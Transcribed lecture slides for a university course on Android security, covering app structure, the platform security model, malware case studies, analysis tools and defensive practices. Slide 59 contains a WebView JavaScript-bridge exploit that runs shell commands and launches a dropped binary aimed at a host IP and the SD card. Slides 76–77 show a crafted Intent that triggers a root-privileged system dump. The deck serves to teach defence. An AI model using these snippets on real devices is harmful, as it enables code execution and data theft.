Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Android Security

Mingshen Sun
October 19, 2015

Android Security

Lecture slides about Android Security for CMSC5726 Computer and Network Security, Spring 2014 in CSE, The Chinese University of Hong Kong.

Mingshen Sun

October 19, 2015
Tweet

More Decks by Mingshen Sun

Other Decks in Research

Transcript

  1. Android Security
    Bob Mingshen Sun
    [email protected]
    November 2, 2015

    View Slide

  2. 1
    1http://blog.applause.com/
    android-or-ios-a-multi-stat-head-to-head-battle/2013/04/

    View Slide

  3. Introduc on — Android Market Share
    Android climbed to 79 percent of smartphone market share in
    2013. — Engadget
    Android dominates 81 percent of world smartphone market.
    — CNET
    2
    2CNET
    Bob (CUHK) Android Security November 2, 2015 3 / 107

    View Slide

  4. Introduc on — Android Malware
    Terrifying new smartphone malware tracks your swipes to
    steal your PIN.
    — BGR
    New Windows malware tries to infect Android devices
    connected to PCs.
    — PCWorld
    First Android bootkit malware spotted; reportedly found on
    over 350,000 mobile devices, most in China. — TNW
    Bob (CUHK) Android Security November 2, 2015 4 / 107

    View Slide

  5. Introduc on — Oldboot
    Oldboot
    The Oldboot has infected more than 500,000 devices in China.
    Chinese retailers flashed this bootkit into the boot partition of
    Android phones they sold.
    Since the boot partition in Android will be loaded as a read-only
    RAM disk, all existing antivirus solutions can’t effectively clean it
    from infected devices.
    The Oldboot will try to connect with its C&C servers, download
    adware and install as system applications.
    It can also execute arbitrary remote commands with root
    permission.
    Bob (CUHK) Android Security November 2, 2015 5 / 107

    View Slide

  6. Outline I
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools
    Bob (CUHK) Android Security November 2, 2015 6 / 107

    View Slide

  7. Outline II
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion
    Bob (CUHK) Android Security November 2, 2015 7 / 107

    View Slide

  8. Outline
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    4 Analysis Tools
    5 Defense
    Bob (CUHK) Android Security November 2, 2015 8 / 107

    View Slide

  9. How to Build an Android Applica on?
    3
    3http://developer.android.com/tools/building/index.html
    Bob (CUHK) Android Security November 2, 2015 9 / 107

    View Slide

  10. How to Build an Android Applica on? — Android
    Project
    Android Project
    |-- AndroidManifest.xml
    |-- src/
    | `-- package_name/
    |
    `-- MainActivity.java
    `-- res/
    |-- drawable-hdpi/
    | `-- ic_launcher.png
    |-- layout/
    |
    `-- activity_main.xml
    `-- values/
    AndroidManifest.xml
    describes the fundamental
    characteristics of the app and
    defines each of its components.
    sdk version
    permission usage
    src/: main srouce files in Java.
    res/
    drawable pictures
    application layout in XML
    string and color definitions in XML
    Bob (CUHK) Android Security November 2, 2015 10 / 107

    View Slide

  11. How to Build an Android Applica on? — Hello World
    IDE: Eclipse with ADT plugin, Android Studio, Android SDK
    public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    TextView tvHelloWorld = (TextView)findViewById(R.id.tv_hello_world);
    tvHelloWorld.setText("Hello World");
    }
    }
    Bob (CUHK) Android Security November 2, 2015 11 / 107

    View Slide

  12. How to Build an Android Applica on? — Hello World
    Layout: activity_main.xml
    xmlns:android="http://schemas.android.com/apk/res/android"
    tools:context=".MainActivity" >
    android:id="@+id/tv_hello_world"
    android:text="TextView" />

    Bob (CUHK) Android Security November 2, 2015 12 / 107

    View Slide

  13. How to Build an Android Applica on? — Hello World
    AndroidManifest.xml

    package="com.example.helloworld"
    android:versionCode="1"
    android:versionName="1.0" >
    android:minSdkVersion="8"
    android:targetSdkVersion="18" />
    android:allowBackup="true"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:theme="@style/AppTheme" >
    android:name="com.example.helloworld.MainActivity"
    android:label="@string/app_name" >






    Bob (CUHK) Android Security November 2, 2015 13 / 107

    View Slide

  14. How to Build an Android Applica on? — Details
    A detailed look at the build process
    1 The Android Asset Packaging Tool
    (aapt) takes resource files and
    compiles them.
    2 aidl tool converts .aidl interfaces.
    3 Compile all of Java code into
    .class files by the Java Compiler.
    4 Convert the .class files into Dalvik
    byte code by the dex tool.
    5 Package all non-compiled &
    compiled resources into an .apk
    file.
    Bob (CUHK) Android Security November 2, 2015 14 / 107

    View Slide

  15. How to Build an Android Applica on? — Details
    4
    A detailed look at the build process
    (cont.)
    6 Sign with a key before installation.
    7 Align the file file by zipalign to
    decrease memory usage.
    4http://developer.android.com/tools/building/index.html
    Bob (CUHK) Android Security November 2, 2015 15 / 107

    View Slide

  16. Applica on Fundamentals
    App components
    Activities: an activity represent a single screen with a user
    interface.
    Services: a service is a component that runs in the background
    to perform long-running operations or to perform work for
    remote process.
    Content providers: a content provider manager a shared set
    of app data.
    Broadcast receivers: a broadcast receiver is a component that
    responds to system-wide broadcast announcements.
    activating components: intent
    Bob (CUHK) Android Security November 2, 2015 16 / 107

    View Slide

  17. Applica on Fundamentals — Ac vity Lifecycle
    Activity states
    [7]
    Bob (CUHK) Android Security November 2, 2015 17 / 107

    View Slide

  18. Applica on Fundamentals — Ac vity Lifecycle
    Activity lifecycle methods
    [7]
    Bob (CUHK) Android Security November 2, 2015 18 / 107

    View Slide

  19. Applica on Fundamentals
    The manifest file
    declaring components



    android:label="@string/example_label" ... >

    ...


    declaring components capabilities

    declaring app requirements

    Bob (CUHK) Android Security November 2, 2015 19 / 107

    View Slide

  20. APK File Structure
    APK files are a type of archive file, specifically in zip format
    packages based on the JAR file format.
    $ file facebook.apk
    facebook.apk: Zip archive data,
    at least v2.0 to extract
    $ unzip facebook.apk
    $ tree facebook
    facebook/
    |-- AndroidManifest.xml
    |-- classes.dex
    |-- resources.arsc
    |-- lib/
    |-- asset/
    |-- res/
    `-- META-INF/
    |-- MANIFEST.MF
    |-- CERT.RSA
    `-- CERT.SF
    Bob (CUHK) Android Security November 2, 2015 20 / 107

    View Slide

  21. APK File Structure — Details
    AndroidManifest.xml: compiled AndroidManifest.xml
    (Android binary XML) which is not readable.
    classes.dex: the classes compiled in the dex file format
    understandable by the Dalvik virtual machine.
    META-INF: certificate SHA-1 digest information.
    lib: native library for different platforms (armeabi, x86, mips).
    Bob (CUHK) Android Security November 2, 2015 21 / 107

    View Slide

  22. Android Architecture
    Bob (CUHK) Android Security November 2, 2015 22 / 107

    View Slide

  23. Android Architecture
    Linux Kernel
    drivers for hardware, networking, file system access and
    inter-process communication
    Libraries: native libraries, daemons and services (written in C
    or C++)
    Android Runtime
    Dalvik Virtual Machine
    Supported core libraries
    Application Framework
    framework services and libraries (written mostly in Java)
    most framework code executes in a Dalvik virtual machine.
    Applications: pre-installed applications & applications from
    marketplaces.
    written in Java, executing in Dalvik VM.
    Bob (CUHK) Android Security November 2, 2015 23 / 107

    View Slide

  24. Android Architecture — Dalvik Virtual Machine
    Dalvik VM is register based Java Virtual Machine.
    Optimized to use less space.
    Dalvik byte code (.dex file) rather than Java byte code (.class).
    More… [6]
    Bob (CUHK) Android Security November 2, 2015 24 / 107

    View Slide

  25. Android Pla orm Security Architecture
    To achieve protecting user data, protecting system
    resources(including the network), providing application isolation,
    Android provides these key security features:
    Robust security at the OS level through the Linux kernel
    Mandatory application sandbox for all applications
    Secure interprocess communication
    Application signing
    Application-defined and user-granted permissions
    Bob (CUHK) Android Security November 2, 2015 25 / 107

    View Slide

  26. Android Pla orm Security Architecture — Sandbox
    multi-user Linux system in
    which each app is a different
    user.
    the system assigns each app
    a unique Linux user ID.
    only the user ID assigned to
    that app can access
    resources.
    each process has its own VM.
    every app runs in its own
    Linux process. [10
    Bob (CUHK) Android Security November 2, 2015 26 / 107

    View Slide

  27. Android Pla orm Security Architecture —
    Inter-process Communica on
    ICC: Inter-component communication
    IPC: Inter-process communication
    Why IPC?
    Each process in its memory address space.
    Provides data isolation.
    Prevents harmful interaction.
    Bob (CUHK) Android Security November 2, 2015 27 / 107

    View Slide

  28. Android Pla orm Security Architecture —
    Inter-component Communica on
    IPC describes the mechanism how different types of android
    components are communicated.
    Component View of ICC: Intent between Activity, Service, Content
    Provider, Broadcast Receiver
    [5]
    Bob (CUHK) Android Security November 2, 2015 28 / 107

    View Slide

  29. Android Pla orm Security Architecture —
    Inter-process Communica on
    GNU/Linux: Signal, PIPE, socket, semaphore, message, shared
    memory.
    Android: Binder — lightweight RPC (Remote Procedure
    Communication) mechanism.
    Bob (CUHK) Android Security November 2, 2015 29 / 107

    View Slide

  30. Android Pla orm Security Architecture —
    Inter-process Communica on
    ServiceManager: manages registered services
    (registered/delete/query).
    Service provider: register to ServiceManager
    Service user: request service from ServiceManager, and
    execute remote services.
    Bob (CUHK) Android Security November 2, 2015 30 / 107

    View Slide

  31. Android Pla orm Security Architecture —
    Fine-grained Permission Mechanism
    accessing protected APIs
    Camera functions
    Location data (GPS)
    Bluetooth functions
    Telephony functions
    SMS/MMS functions
    Network/data connections
    declaring in AndroidManifest.xml explicitly.




    Bob (CUHK) Android Security November 2, 2015 31 / 107

    View Slide

  32. Android Pla orm Security Architecture — Applica on
    Signing
    The Android system requires that all installed applications be
    digitally signed with a certificate whose private key is held by the
    application’s developer.
    All application must be signed.
    A special debug key for test and debug.
    Sign with your private key when publishing.
    Self-signed certificates, no certificate authority is need.
    Expiration date.
    Keytool & Jarsigner
    zipalign
    Bob (CUHK) Android Security November 2, 2015 32 / 107

    View Slide

  33. Android Pla orm Security Architecture — Applica on
    Signing
    Motivations of APK signing.
    Update apps.
    Ensure application is unmodified.
    Data shared between applications from same developers.
    Bob (CUHK) Android Security November 2, 2015 33 / 107

    View Slide

  34. Distribu on Methods of Apps
    Google Play (official market)
    More secure, but still have malware.
    Third-party markets/forums
    popular in China
    less limitations
    a number of malware
    Bob (CUHK) Android Security November 2, 2015 34 / 107

    View Slide

  35. Outline
    1 Introduction
    2 Background
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools
    5 Defense
    Bob (CUHK) Android Security November 2, 2015 35 / 107

    View Slide

  36. Subsection 1
    Android Malware

    View Slide

  37. Android Malware — Introduc on
    There is a massive growth in the volume of malware families
    and samples. — Symantec
    [12]
    Bob (CUHK) Android Security November 2, 2015 37 / 107

    View Slide

  38. Android Malware — Introduc on
    Top ten app categories with the highest percentage of malware.
    On third-party app stores, the most dangerous is the Games/Arcade
    & Action category followed by the Photography category.
    [12]
    Bob (CUHK) Android Security November 2, 2015 38 / 107

    View Slide

  39. Android Malware — Introduc on
    Third-party app stores hosting the most malware from January to
    June 2013.
    Although malware slips into Google Play, most malware is hosted
    on third-party app stores. There are also stores that only host
    malware.
    [12]
    Bob (CUHK) Android Security November 2, 2015 39 / 107

    View Slide

  40. Android Malware — Characteriza on
    Characterized by
    Malware installation
    Activation
    Malicious payloads
    Bob (CUHK) Android Security November 2, 2015 40 / 107

    View Slide

  41. Android Malware — Characteriza on
    Malware installation
    Repackaging
    Update attacks
    Drive-by Download
    Others
    Bob (CUHK) Android Security November 2, 2015 41 / 107

    View Slide

  42. Android Malware — Characteriza on
    Repackaged Malware
    Characteristics of repackaged malware
    one of the most common techniques malware
    piggyback malicious payloads into popular applications
    Steps
    download apps
    disassemble apk file
    smali/baksmali
    apktool
    IDA Pro

    enclose malicious payloads
    re-assemble and submit to official or alternative Android
    markets.
    Bob (CUHK) Android Security November 2, 2015 42 / 107

    View Slide

  43. Android Malware — Characteriza on
    Repackaged Malware
    Case study — Flappy Bird [14]
    massively popular small
    game on smartphone
    exactly the same appearance
    as the original version
    fake Android Flappy Bird
    Premium Service Abusers —
    apps that send messages to
    premium numbers
    causing unwanted charges to
    vimctims’ phone billing
    especially rampant in app
    markets in Russia and
    Vietnam
    Bob (CUHK) Android Security November 2, 2015 43 / 107

    View Slide

  44. Android Malware — Characteriza on
    Repackaged Malware
    Case study — Flappy Bird [14]
    read/send text message permission
    which is not required in the original
    version
    send messages to premium
    numbers (8777 & 8738)
    connects to a C&C server to receive
    instructions
    information leakage
    Other game repackaged malware
    Candy Crush
    Angry Bird Space
    Temple Run 2
    Bob (CUHK) Android Security November 2, 2015 44 / 107

    View Slide

  45. Android Malware — Characteriza on
    Update Attack
    repackage popular apps
    do not enclose the payload as a whole
    piggyback an update component tha will fetch or download the
    malicious payloads at runtime
    Static scanning?
    Bob (CUHK) Android Security November 2, 2015 45 / 107

    View Slide

  46. Android Malware — Characteriza on
    Update Attack
    Case Study — BaseBridge
    update dialogue
    saying that a new
    version is available
    malicious payload will
    then be installed
    [15]
    Bob (CUHK) Android Security November 2, 2015 46 / 107

    View Slide

  47. Android Malware — Characteriza on
    Drive-by Download
    entice users to download “interesting” or “feature-rich” apps
    GGTracker in-app advertisement
    Jifake QR code
    Others
    spyware
    fake apps
    intentional malicious apps
    rely on the root privilege
    Bob (CUHK) Android Security November 2, 2015 47 / 107

    View Slide

  48. Android Malware — Characteriza on
    Characterized by Activiation
    BOOT_COMPLETED
    SMS_RECEIVED
    ACTION_MAIN
    events combination
    Bob (CUHK) Android Security November 2, 2015 48 / 107

    View Slide

  49. Android Malware — Characteriza on
    Characterized by Malicious Payloads
    privilege escalation
    remote control
    C&C server
    botnet
    financial charge
    subscribe to premium-rate services
    information collection
    SMS messages
    phone numbers
    email address
    installed package list?
    Bob (CUHK) Android Security November 2, 2015 49 / 107

    View Slide

  50. Android Malware — Evolu on
    From naive repakcaging to sophasticated obfuscation
    DroidKungfu
    root exploits
    C&C servers
    shadow playloads: apk package
    obfuscation, JNI
    Bob (CUHK) Android Security November 2, 2015 50 / 107

    View Slide

  51. Android Malware — Evolu on
    Bleeding-edge malware
    AVPasser: anti-detection
    Report: http://contagiominidump.blogspot.hk/2014/
    01/android-oldboot-mouabads.html
    Oldboot: bootkit on Android
    “modify devices’ boot partition and booting script file to launch
    system service and extract malicious application during the
    early stage of system’s booting”
    “Due to the special RAM disk feature of Android devices’ boot
    partition, all current mobile antivirus product in the world can’t
    completely remove this Trojan or effectively repair the system.”
    http://blogs.360.cn/360mobile/2014/01/17/
    oldboot-the-first-bootkit-on-android/
    Bob (CUHK) Android Security November 2, 2015 51 / 107

    View Slide

  52. Android Malware — Distribu on
    [8]
    Bob (CUHK) Android Security November 2, 2015 52 / 107

    View Slide

  53. Subsection 3
    Vulnerabili es of Android OS

    View Slide

  54. Permission Abuses
    Android Permission Mechanism
    request permissions before
    installation
    once accepted, never ask you again
    no idea about when/where/how to
    use these permissions
    Permission abuses: 37 permissions for a
    map application.
    Bob (CUHK) Android Security November 2, 2015 54 / 107

    View Slide

  55. Capabili es Leaks
    Permission re-delegation
    Malware do not have
    permission to send text.
    Legitimate application has
    permission.
    Legitimate application
    expose their component to
    other without verification
    accidentally.
    Malware utilize the
    permission of deputy
    (legitimate application) to
    complete the malicious
    behaviors.
    [4]
    Bob (CUHK) Android Security November 2, 2015 55 / 107

    View Slide

  56. Collusion A ack
    malicious applications collude to combine their permissions
    perform actions beyond their individual pervileges
    Bob (CUHK) Android Security November 2, 2015 56 / 107

    View Slide

  57. WebView Vulnerabili es
    What is WebView?
    embedded browser in side an app
    web application for cross-platform
    HTML5 and JavaScript
    How to enable apps to interact with the web content?
    Apps -> Web pages
    apps can invoke JavaScript code into webpages (e.g., load a
    JavaScript into page)
    apps can monitor and intercept the events occurred within web
    pages (e.g., onPageFinished event)
    Web pages -> Apps
    apps can register interfaces to WebView (e.g., File operations
    interface)
    JavaScript code can invoke these interface (e.g., JavaScript can
    read/write internal files)
    Bob (CUHK) Android Security November 2, 2015 57 / 107

    View Slide

  58. WebView Vulnerabili es — Thread Models
    [9]
    Bob (CUHK) Android Security November 2, 2015 58 / 107

    View Slide

  59. WebView Vulnerabili es — Case Study
    Abusing WebView JavaScript Bridges
    <br/>function execute(cmdArgs) {<br/>return SmokeyBear.getClass()<br/>.forName("java.lang.Runtime")<br/>.getMethod("getRuntime",null)<br/>.invoke(null,null)<br/>.exec(cmdArgs);<br/>}<br/>execute(["/system/bin/sh","-c","echo '"+armBinary+<br/>"' > /data/data/com.example.webviewhack/armB2"]);<br/>execute(["chmod","755","/data/data/com.example.webviewhack/armB2"]);<br/>var p = execute(["/data/data/com.example.webviewhack/armB2",<br/>"192.168.1.116","/mnt/sdcard"]);<br/>document.write(getContents(p.getInputStream()));<br/>
    Bob (CUHK) Android Security November 2, 2015 59 / 107

    View Slide

  60. Root Exploits
    What is rooting?
    Linux root user
    get around any restrictions
    Why would you root?
    access entire file system
    install special apps
    flash custom ROMs
    Why wouldn’t you root?
    void your warranty
    brick your phone
    security risk: you may disclose root privilege to malware
    accidentally
    Bob (CUHK) Android Security November 2, 2015 60 / 107

    View Slide

  61. Root Exploits
    How to gain root in Android?
    Linux kernel exploits: CVE-2012-0056, CVE-2009-2692.
    (http://www.cvedetails.com/)
    Android exploits: GingerBreak, zergRush.
    Third-party firmware with root privilege.
    Bob (CUHK) Android Security November 2, 2015 61 / 107

    View Slide

  62. Android Apps Security5
    data storing
    data transportation
    password and authentication
    component capability leaks
    others
    5Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013.
    Bob (CUHK) Android Security November 2, 2015 62 / 107

    View Slide

  63. Android Apps Security — Data storing
    Data Storing External storage (SD card):
    no permission management
    read/write anything on external storage
    Internal storage (SQLite, XML, File):
    protected by user id
    need root to access
    Bob (CUHK) Android Security November 2, 2015 63 / 107

    View Slide

  64. Android Apps Security — Data storing
    Attack Surface: storing privacy on SD card.
    Example: backup data, IM messages, SNS data
    Problem: can be accessed by others
    Consequence: privacy leakage
    Solution: encryption
    Bob (CUHK) Android Security November 2, 2015 64 / 107

    View Slide

  65. Android Apps Security — Data storing
    Attack Surface: storing dynamic payloads on SD card.
    Example: store downloaded APK, DEX and JAR on SD card and
    load/install in runtime
    Problem: manipulated by others
    Consequence: phishing, malware, privacy
    Solution: check authority and integrity before installation
    Bob (CUHK) Android Security November 2, 2015 65 / 107

    View Slide

  66. Android Apps Security — Data storing
    Attack Surface: storing configurations on SD card.
    Example: storing configuration data in plain text
    Problem: manipulated by others
    Consequence: phishing, malware, privacy leakage, MITM
    attack, SQL injection
    Solution: internal, encryption, check authority and integrity
    before using
    Bob (CUHK) Android Security November 2, 2015 66 / 107

    View Slide

  67. Android Apps Security — Data storing
    Attack Surface: world readable/writeable internal file
    Example: sharing data between apps using
    Context.MODE_WORLD_READABLE ||
    CONTEXT.MODE_WORLD_WRITEABLE
    Problem: manipulated by others
    Consequence: privacy leakage
    Solution: Content Provider, do not set world readable and
    writeable for internal data
    Bob (CUHK) Android Security November 2, 2015 67 / 107

    View Slide

  68. Android Apps Security — Data storing
    Attack Surface: storing privacy in internal storage
    Example: password, credit card number in plain text
    Problem: root to access
    Consequence: privacy leakage
    Solution: do not store this information, encryption, other
    authentication methods
    Bob (CUHK) Android Security November 2, 2015 68 / 107

    View Slide

  69. Android Apps Security — Data transporta on
    Attack Surface: plain text transportation.
    Example: plain text in transportation for password, session
    key and privacy
    Problem: open WiFi, sniffing
    Consequence: privacy leakage
    Solution: TLS/SSL
    Bob (CUHK) Android Security November 2, 2015 69 / 107

    View Slide

  70. Example
    POST /api/checkaccount HTTP/1.1
    User-Agent: MomoChat/1.11build Android/12 (LT18i; Android 2.3.4;
    zh_CN)
    Content-Length: 249
    Content-Type: application/x-www-form-urlencoded
    Host: www.immomo.com:80
    Connection: Keep-Alive
    uid=85dab7d268769df46abe111a82976931&phone_netWork=
    2&screen=480x854&model=LT18i&rom=2.3.4&phone_type=G
    SM&device_type=android&account=xxxxxx&mac=5c%3Ab5%3
    A24%3A09%3Ae1%3A58&market_source=1&buildnumber=4.0.
    2.A.0.58%2Fxf_v3w&password=xxxxxx&version=12
    Bob (CUHK) Android Security November 2, 2015 70 / 107

    View Slide

  71. Android Apps Security — Data transporta on
    Attack Surface: SSL certificate
    Example: trust all certificate
    Problem: MITM attack
    Consequence: privacy leakage
    Solution: CA, keystore
    Bob (CUHK) Android Security November 2, 2015 71 / 107

    View Slide

  72. Android Apps Security — Data transporta on
    Attack Surface: SMS message
    Example: use SMS message to register, password
    Problem: send, read, hijack
    Consequence: privacy leakage
    Solution: HTTPS
    Bob (CUHK) Android Security November 2, 2015 72 / 107

    View Slide

  73. Android Apps Security — Password
    Attack Surface:
    weak password, short password, base64, XOR
    session key: hash(account+password)
    IMEI, IMSI
    Bob (CUHK) Android Security November 2, 2015 73 / 107

    View Slide

  74. Android Apps Security — Capability Leaks
    Attack Surface: Intent
    call B => execution
    call B with parameters => results
    call B => results
    fake B => access A’s data
    fake B => triggered by A, phishing
    Bob (CUHK) Android Security November 2, 2015 74 / 107

    View Slide

  75. Example








    Bob (CUHK) Android Security November 2, 2015 75 / 107

    View Slide

  76. Example
    if ("284".equals(paramIntent.getData().getHost())) {
    asyncExecute(new Runnable() {
    public void run() {
    try {
    String str = CitBroadcastReceiver.TAG;
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "bugreport";
    arrayOfString[1] = ">";
    arrayOfString[2] = m_logFileName;
    CitUtils.rootExecProgram(str, arrayOfString, true);
    }
    }
    });
    Bob (CUHK) Android Security November 2, 2015 76 / 107

    View Slide

  77. Example
    Attack:
    Intent intent = new Intent();
    intent.setAction("android.provider.Telephony.SECRET_CODE");
    intent.setData(Uri.parse("android_secret_code://284"));
    sendBroadcast(intent);
    execute bugreport in root priveledge
    dump system infor into SD Card
    Bob (CUHK) Android Security November 2, 2015 77 / 107

    View Slide

  78. Android Apps Security — Capability Leaks
    Attack Surface: Intent Solution:
    signature permission
    checking
    Bob (CUHK) Android Security November 2, 2015 78 / 107

    View Slide

  79. Android Apps Security — Others
    Attack Surface:
    Logcat
    Open WiFi
    WebView
    Bob (CUHK) Android Security November 2, 2015 79 / 107

    View Slide

  80. Outline
    1 Introduction
    2 Background
    3 Attacks
    4 Analysis Tools
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense
    Bob (CUHK) Android Security November 2, 2015 80 / 107

    View Slide

  81. Tools in Android SDK
    adb: Android Debug Bridge (adb) is a versatile command line tool
    that lets you communicate with an emulator instance or connected
    Android-powered device.
    $ adb install ...apk
    $ adb shell
    $ adb pull
    $ adb push
    logcat: The Android logging system provides a mechanism for
    collecting and viewing system debug output.
    $ adb logcat
    log information ...
    Others:
    aapt: Android Asset Packaging Tool
    keytool & jarsigner: sign your application
    zipalign: align the final pacakge
    Bob (CUHK) Android Security November 2, 2015 81 / 107

    View Slide

  82. Sta c Analysis — Fundamentals
    Recall
    .java -> .class -> classes.dex
    zip classes.dex into apk file with other resources
    dex file is bytecode file for Dalvik VM
    Reverse engineer?
    .dex format
    bytecode format
    instruction formats
    specifications: https://source.android.com/devices/
    tech/dalvik/dalvik-bytecode.html
    Bob (CUHK) Android Security November 2, 2015 82 / 107

    View Slide

  83. Sta c Analysis — smali/baksmali
    smali/baksmali: https://code.google.com/p/smali/
    smali/baksmali is an assembler/disassembler for the dex format
    used by dalvik, Android’s Java VM implementation.
    Bob (CUHK) Android Security November 2, 2015 83 / 107

    View Slide

  84. Sta c Analysis — smali/baksmali
    HelloWorld application
    $ unzip HelloWorld.apk -d hello_world
    Archive: HelloWorld.apk
    inflating: hello_world/res/layout/activity_main.xml
    inflating: hello_world/classes.dex
    ...
    $ java -jar baksmali.jar hello_world/classes.dex
    $ tree
    com
    `-- example
    `-- helloworld
    |-- BuildConfig.smali
    |-- MainActivity.smali
    |-- R$attr.smali
    |-- R$dimen.smali
    |-- R$drawable.smali
    |-- R$id.smali
    |-- R$layout.smali
    |-- R$menu.smali
    |-- R.smali
    |-- R$string.smali
    `-- R$style.smali
    Bob (CUHK) Android Security November 2, 2015 84 / 107

    View Slide

  85. Sta c Analysis — android-apktool
    apktool is based on smali/baksmali.
    https://code.google.com/p/android-apktool/
    It is a tool for reverse engineering 3rd party, closed, binary
    Android apps.
    It can decode resources to nearly original form and rebuild
    them after making some modifications; it makes possible to
    debug smali code step by step.
    Also it makes working with app easier because of project-like
    files structure and automation of some repetitive tasks like
    building apk, etc.
    Usage of apktool
    d[ecode] [OPTS] []
    b[uild] [OPTS] [] []
    Bob (CUHK) Android Security November 2, 2015 85 / 107

    View Slide

  86. Sta c Analysis — apktool
    HelloWorld application
    $ apktool d HelloWorld.apk
    $ cat MainActivity.smali
    .class public Lcom/example/helloworld/MainActivity;
    .super Landroid/app/Activity;
    .source "MainActivity.java"
    ...
    .method protected onCreate(Landroid/os/Bundle;)V
    ...
    const-string v1, "Hello World"
    invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang
    ...
    Change "Hell World" to "Hey Android".
    Bob (CUHK) Android Security November 2, 2015 86 / 107

    View Slide

  87. Sta c Analysis — apktool
    HelloWorld application
    $ apktool b HelloWorld
    $ file HelloWorld/dist/HelloWorld.apk
    HelloWorld/dist/HelloWorld.apk: Zip archive data, at least v2.0 to extract
    $ jarsigner ...
    $ zipalign ...
    $ adb install HelloWorld.apk
    Bob (CUHK) Android Security November 2, 2015 87 / 107

    View Slide

  88. Sta c Analysis — dex2jar & jd-gui
    dex2jar: reverse dex to
    class and package into jar.
    https://code.google.
    com/p/dex2jar/
    jd-gui: JD-GUI is a
    standalone graphical utility
    that displays Java source
    codes of “.class” files.
    http://jd.benow.ca/
    Bob (CUHK) Android Security November 2, 2015 88 / 107

    View Slide

  89. Sta c Analysis — androguard
    Androguard is mainly a tool written in python to play with :
    Dex/Odex (Dalvik virtual machine) (.dex) (disassemble,
    decompilation),
    APK (Android application) (.apk),
    Android’s binary xml (.xml),
    Android Resources (.arsc).
    Bob (CUHK) Android Security November 2, 2015 89 / 107

    View Slide

  90. Sta c Analysis — androguard
    Features:
    map DEX/ODEX/AP-
    K/AXML/ARSC format
    into Python objects
    disassemble,
    decompilation and
    modification of
    DEX/ODEX/APK
    static analysis
    ipython/Sublime text
    editor
    similarity
    measurement
    visulizaion
    Bob (CUHK) Android Security November 2, 2015 90 / 107

    View Slide

  91. Dynamic Analysis — DroidBox
    DroidBox is developed to offer dynamic
    analysis of Android applications.
    Hashes for the analyzed package
    Incoming/outgoing network data
    File read and write operations
    Started services and loaded classes
    through DexClassLoader
    Information leaks via the network,
    file and SMS
    Circumvented permissions
    Cryptography operations
    performed using Android API
    Listing broadcast receivers
    Sent SMS and phone calls
    Bob (CUHK) Android Security November 2, 2015 91 / 107

    View Slide

  92. Dynamic Analysis — TaintDroid
    TaintDroid: Tracking how apps
    use sensitive information
    required integrating our software
    into the Android platform at a low
    level. http://appanalysis.
    org/index.html
    Demo: http:
    //www.youtube.com/
    watch?v=qnLujX1Dw4Y
    Bob (CUHK) Android Security November 2, 2015 92 / 107

    View Slide

  93. Online Analysis
    Anubis: generate online analysis report.
    https://anubis.iseclab.org/
    VirusTotal: cloud detection (almost all detection engines)
    https://www.virustotal.com/
    Bob (CUHK) Android Security November 2, 2015 93 / 107

    View Slide

  94. Outline
    1 Introduction
    2 Background
    3 Attacks
    4 Analysis Tools
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion
    Bob (CUHK) Android Security November 2, 2015 94 / 107

    View Slide

  95. Obfusca on — ProGuard
    ProGuard is a free Java class file shrinker, optimizer, obfuscator,
    and preverifier.
    It detects and removes unused classes, fields, methods, and
    attributes.
    It optimizes bytecode and removes unused instructions.
    It renames the remaining classes, fields, and methods using
    short meaningless names.
    ProGuard can be used for Android obfuscation, and is integrated in
    Android build system.
    Bob (CUHK) Android Security November 2, 2015 95 / 107

    View Slide

  96. Obfusca on — ProGuard
    To enable ProGuard, set the proguard.config property in the
    /project.properties file.
    proguard.config=proguard.cfg
    Bob (CUHK) Android Security November 2, 2015 96 / 107

    View Slide

  97. Obfusca on — ProGuard
    Disassembling obfuscated
    code.
    pluginsdk
    |-- a
    | |-- a.smali
    | `-- b.smali
    |-- aa.smali
    |-- ab.smali
    |-- ac.smali
    |-- ad.smali
    |-- ae.smali
    |-- af.smali
    |-- ag.smali
    |-- ah.smali
    |-- ai.smali
    |-- aj.smali
    |-- ak.smali
    |-- al.smali
    |-- am.smali
    |-- an.smali
    |-- a.smali
    |-- b
    .method public final e(Ljava/lang/Class;)Lb/a
    .locals 1
    .parameter
    .prologue
    .line 45
    invoke-static {p1},
    Lb/a/a/a;->f(Ljava/lang/Class;)Lb/a/a/a/a
    move-result-object v0
    iput-object v0, p0, Lb/a/a/a;->fWt:Lb/a/a/a
    .line 46
    return-object p0
    .end method
    Bob (CUHK) Android Security November 2, 2015 97 / 107

    View Slide

  98. Android NDK
    Android NDK: a toolset that allows you to implement parts of your
    app using native-code languages such as C and C++.
    http:
    //developer.android.com/tools/sdk/ndk/index.html
    difficult to reverse engineer
    more complex
    less portable
    Bob (CUHK) Android Security November 2, 2015 98 / 107

    View Slide

  99. Security Tips — Storing Data
    Using internal storage: By default, files on internal storage are
    accessible only to your app.
    avoid using the MODE_WORLD_WRITEABLE or
    MODE_WORLD_READABLE modes
    cannot limit data access to particular applications
    cannot control data format
    encrypt sensitive data
    Bob (CUHK) Android Security November 2, 2015 99 / 107

    View Slide

  100. Security Tips — Storing Data
    Using external storage: Files on external storage (SD Cards) are
    globally readable and writable.
    perform input validation
    avoid putting dynamic payload on external storage
    verify before loading
    Bob (CUHK) Android Security November 2, 2015 100 / 107

    View Slide

  101. Security Tips — Storing Data
    Using content providers: offer a structured storage mechanism
    that can be limited to your own application or exported to allow
    access by other applications.
